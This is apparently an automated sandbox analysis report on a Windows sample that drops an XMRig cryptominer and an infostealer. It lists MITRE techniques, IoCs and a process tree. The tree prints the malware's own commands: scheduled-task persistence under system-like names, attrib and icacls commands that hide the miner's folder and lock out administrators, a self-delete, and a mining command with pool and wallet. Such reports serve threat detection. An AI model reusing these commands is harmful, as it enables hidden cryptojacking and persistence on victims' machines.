xmrig | cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427

Resubmissions

28-02-2021 15:01

210228-5dd8sx9g26 10

28-02-2021 07:28

210228-xfflmbv19n 10

Analysis

max time kernel
600s
max time network
585s
platform
windows10_x64
resource
win10v20201028
submitted
28-02-2021 15:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Size

6.2MB
MD5

bd64d2e0d11093bbd84be2b6ca1c113d
SHA1

8fae8984391bd9dddb7afc0ebdd87a05954a7134
SHA256

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427
SHA512

b2ebe1a566c9a22fa34795b5906721242a005b69cb1301ef6817ce31c45b9ca9da0e9b85c2973fe27a5910077c909469c91bf8a32bc8d370fdd84ce00415e3ad

Score

10^/10

xmrig discovery evasion miner spyware themida trojan

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 14 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\1.exe	xmrig
C:\Users\Admin\AppData\Roaming\1337\1.exe	xmrig
C:\Users\Admin\AppData\Roaming\1337\1.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
behavioral3/memory/1556-67-0x00007FF78EFA0000-0x00007FF78F6C7000-memory.dmp	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
behavioral3/memory/2244-77-0x00007FF78EFA0000-0x00007FF78F6C7000-memory.dmp	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig

Executes dropped EXE 18 IoCs

Processes:

lxxxxxx.exe1.exeFile.exe1.exe@asasinalex.exeShellExperienceHost.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exe

pid	process
3512	lxxxxxx.exe
2584	1.exe
3952	File.exe
2484	1.exe
2004	@asasinalex.exe
3896	ShellExperienceHost.exe
3892	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
776	SecurityHealthTray.exe
740	SecurityHealthTray.exe
2244	SecurityHealthTray.exe
700	SecurityHealthTray.exe
5068	SecurityHealthTray.exe
4188	SecurityHealthTray.exe
1040	SecurityHealthTray.exe
4956	SecurityHealthTray.exe
1176	SecurityHealthTray.exe
420	SecurityHealthTray.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SecurityHealthTray.exeSecurityHealthTray.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	SecurityHealthTray.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	SecurityHealthTray.exe

Loads dropped DLL 1 IoCs

Processes:

File.exe

pid process

3952 File.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

2032 icacls.exe
200 icacls.exe
1176 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3952	File.exe

pid	process
2032	icacls.exe
200	icacls.exe
1176	icacls.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral3/memory/744-2-0x0000000000A40000-0x00000000016FC000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 api.ipify.org
12 api.ipify.org
13 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

pid process

744 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

flow	ioc
11	api.ipify.org
12	api.ipify.org
13	ip-api.com

pid	process
744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Drops file in Windows directory 1 IoCs

Processes:

lxxxxxx.exe

description	ioc	process
File created	C:\Windows\InfusedApps\Frameworks\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe\AppxMetadata\WmiPrvSE.exe	lxxxxxx.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1976 schtasks.exe
776 schtasks.exe
1364 schtasks.exe
2152 schtasks.exe
2380 schtasks.exe
2436 schtasks.exe

pid	process
1976	schtasks.exe
776	schtasks.exe
1364	schtasks.exe
2152	schtasks.exe
2380	schtasks.exe
2436	schtasks.exe

Modifies registry class 2 IoCs

Processes:

SecurityHealthTray.exeSecurityHealthTray.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	SecurityHealthTray.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	SecurityHealthTray.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

@asasinalex.exelxxxxxx.exeShellExperienceHost.exeSecurityHealthTray.exeSecurityHealthTray.exe

pid	process
2004	@asasinalex.exe
2004	@asasinalex.exe
3512	lxxxxxx.exe
3896	ShellExperienceHost.exe
3892	SecurityHealthTray.exe
3892	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe
1556	SecurityHealthTray.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

SecurityHealthTray.exeSecurityHealthTray.exe

pid process

1556 SecurityHealthTray.exe
2244 SecurityHealthTray.exe

pid	process
1556	SecurityHealthTray.exe
2244	SecurityHealthTray.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

@asasinalex.exelxxxxxx.exeShellExperienceHost.exeSecurityHealthTray.exeSecurityHealthTray.exe

description	pid	process
Token: SeDebugPrivilege	2004	@asasinalex.exe
Token: SeDebugPrivilege	3512	lxxxxxx.exe
Token: SeDebugPrivilege	3896	ShellExperienceHost.exe
Token: SeLockMemoryPrivilege	1556	SecurityHealthTray.exe
Token: SeLockMemoryPrivilege	1556	SecurityHealthTray.exe
Token: SeLockMemoryPrivilege	2244	SecurityHealthTray.exe
Token: SeLockMemoryPrivilege	2244	SecurityHealthTray.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

chrome.exe

pid process

2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe

pid	process
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe1.exeFile.execmd.execmd.exelxxxxxx.exe@asasinalex.execmd.exeSecurityHealthTray.exeSecurityHealthTray.exechrome.exechrome.exe

description	pid	process	target process
PID 744 wrote to memory of 3512	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	lxxxxxx.exe
PID 744 wrote to memory of 3512	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	lxxxxxx.exe
PID 744 wrote to memory of 2584	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	1.exe
PID 744 wrote to memory of 2584	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	1.exe
PID 744 wrote to memory of 3952	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 744 wrote to memory of 3952	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 744 wrote to memory of 3952	744	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 2584 wrote to memory of 1976	2584	1.exe	schtasks.exe
PID 2584 wrote to memory of 1976	2584	1.exe	schtasks.exe
PID 2584 wrote to memory of 1504	2584	1.exe	cmd.exe
PID 2584 wrote to memory of 1504	2584	1.exe	cmd.exe
PID 3952 wrote to memory of 2484	3952	File.exe	1.exe
PID 3952 wrote to memory of 2484	3952	File.exe	1.exe
PID 2584 wrote to memory of 4076	2584	1.exe	cmd.exe
PID 2584 wrote to memory of 4076	2584	1.exe	cmd.exe
PID 3952 wrote to memory of 2004	3952	File.exe	@asasinalex.exe
PID 3952 wrote to memory of 2004	3952	File.exe	@asasinalex.exe
PID 3952 wrote to memory of 2004	3952	File.exe	@asasinalex.exe
PID 2584 wrote to memory of 1352	2584	1.exe	cmd.exe
PID 2584 wrote to memory of 1352	2584	1.exe	cmd.exe
PID 1504 wrote to memory of 2532	1504	cmd.exe	attrib.exe
PID 1504 wrote to memory of 2532	1504	cmd.exe	attrib.exe
PID 1352 wrote to memory of 2032	1352	cmd.exe	icacls.exe
PID 1352 wrote to memory of 2032	1352	cmd.exe	icacls.exe
PID 1504 wrote to memory of 2204	1504	cmd.exe	attrib.exe
PID 1504 wrote to memory of 2204	1504	cmd.exe	attrib.exe
PID 1352 wrote to memory of 200	1352	cmd.exe	icacls.exe
PID 1352 wrote to memory of 200	1352	cmd.exe	icacls.exe
PID 1352 wrote to memory of 1176	1352	cmd.exe	icacls.exe
PID 1352 wrote to memory of 1176	1352	cmd.exe	icacls.exe
PID 1504 wrote to memory of 3944	1504	cmd.exe	attrib.exe
PID 1504 wrote to memory of 3944	1504	cmd.exe	attrib.exe
PID 3512 wrote to memory of 776	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 776	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 1364	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 1364	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2152	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2152	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2380	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2380	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2436	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 2436	3512	lxxxxxx.exe	schtasks.exe
PID 3512 wrote to memory of 3896	3512	lxxxxxx.exe	ShellExperienceHost.exe
PID 3512 wrote to memory of 3896	3512	lxxxxxx.exe	ShellExperienceHost.exe
PID 2004 wrote to memory of 3688	2004	@asasinalex.exe	cmd.exe
PID 2004 wrote to memory of 3688	2004	@asasinalex.exe	cmd.exe
PID 2004 wrote to memory of 3688	2004	@asasinalex.exe	cmd.exe
PID 3688 wrote to memory of 2204	3688	cmd.exe	choice.exe
PID 3688 wrote to memory of 2204	3688	cmd.exe	choice.exe
PID 3688 wrote to memory of 2204	3688	cmd.exe	choice.exe
PID 3892 wrote to memory of 1556	3892	SecurityHealthTray.exe	SecurityHealthTray.exe
PID 3892 wrote to memory of 1556	3892	SecurityHealthTray.exe	SecurityHealthTray.exe
PID 1556 wrote to memory of 2244	1556	SecurityHealthTray.exe	SecurityHealthTray.exe
PID 1556 wrote to memory of 2244	1556	SecurityHealthTray.exe	SecurityHealthTray.exe
PID 2828 wrote to memory of 2064	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 2064	2828	chrome.exe	chrome.exe
PID 3164 wrote to memory of 2112	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 2112	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 3740	3164	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2532 attrib.exe
2204 attrib.exe
3944 attrib.exe

pid	process
2532	attrib.exe
2204	attrib.exe
3944	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
"C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Documents and Settings\csrss.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:776

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Documents and Settings\WMIADAP.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:1364

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "lxxxxxx" /sc ONLOGON /tr "'C:\Documents and Settings\lxxxxxx.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2152

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Documents and Settings\ShellExperienceHost.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2380

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Documents and Settings\ShellExperienceHost.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2436

C:\Documents and Settings\ShellExperienceHost.exe
"C:\Documents and Settings\ShellExperienceHost.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"
3⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
3⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\system32\attrib.exe
ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"
4⤵
- Views/modifies file attributes
PID:2532

C:\Windows\system32\attrib.exe
ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"
4⤵
- Views/modifies file attributes
PID:2204

C:\Windows\system32\attrib.exe
ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
4⤵
- Views/modifies file attributes
PID:3944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml
3⤵
PID:4076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:2032

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:200

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:1176

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3952

C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe
"C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "@asasinalex.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3688

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:2204

C:\Users\Admin\AppData\Roaming\1337\1.exe
"C:\Users\Admin\AppData\Roaming\1337\1.exe"
3⤵
- Executes dropped EXE
PID:2484

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3892

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.supportxmr.com:3333 -u 41xymULmr9LRENCpbQbVtT37sg4GZWnwfTGfy8cdmLz9GPLs2zxvi4NDN1pCKuCu7ycHHHhphxpu7g4tv4BMZUgL1edwe2A -p x --rig-id={dbbebbebefe}
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1556

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=50 -o pool.supportxmr.com:3333 -u 41xymULmr9LRENCpbQbVtT37sg4GZWnwfTGfy8cdmLz9GPLs2zxvi4NDN1pCKuCu7ycHHHhphxpu7g4tv4BMZUgL1edwe2A -p x --rig-id={dbbebbebefe}
3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:776

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa8,0xd4,0x7fff7b806e00,0x7fff7b806e10,0x7fff7b806e20
2⤵
PID:2064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1492 /prefetch:2
2⤵
PID:2568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:1
2⤵
PID:3088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
2⤵
PID:3160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
2⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
2⤵
PID:4104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
2⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
2⤵
PID:4160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
2⤵
PID:1684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2036 /prefetch:8
2⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
2⤵
PID:4428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:8
2⤵
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:8
2⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
